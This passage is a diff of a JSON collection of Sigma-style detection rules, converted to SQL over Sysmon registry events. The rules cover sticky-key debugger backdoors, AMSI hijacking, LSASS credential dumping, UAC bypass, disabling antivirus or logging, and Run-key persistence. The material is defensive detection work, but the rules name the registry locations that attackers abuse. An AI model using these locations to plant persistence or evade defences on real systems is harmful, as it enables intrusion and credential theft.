NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_amsi_com_hijack.yml" - }, - { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", - "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" - ], - "filename": "registry_set_persistence_xll.yml" - }, - { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" - ], - "filename": "registry_set_uac_bypass_wmp.yml" - }, - { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" - ], - "filename": "registry_set_disable_macroruntimescanscope.yml" - }, - { - "title": "Set TimeProviders DllName", - "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", - "status": "experimental", - "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.003" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" - ], - "filename": "registry_set_timeproviders_dllname.yml" - }, - { - "title": "New RUN Key Pointing to Suspicious Folder", - "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "status": "experimental", - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "falsepositives": [ - "Software using weird folders for updates" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_run_key_img_folder.yml" - }, - { - "title": "Change the Fax Dll", - "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "status": "experimental", - "description": "Detect possible persistence using Fax DLL load when service restart", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" - ], - "filename": "registry_set_fax_dll_persistance.yml" - }, - { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ], - "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" - ], - "filename": "registry_set_susp_printer_driver.yml" - }, - { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", - "tags": [ - "attack.impact", - "attack.t1490" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" - ], - "filename": "registry_set_disable_system_restore.yml" - }, - { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" - ], - "filename": "registry_set_add_port_monitor.yml" - }, - { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", - "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" - ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" - }, - { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" - ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" - }, - { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1112" + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", - "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE 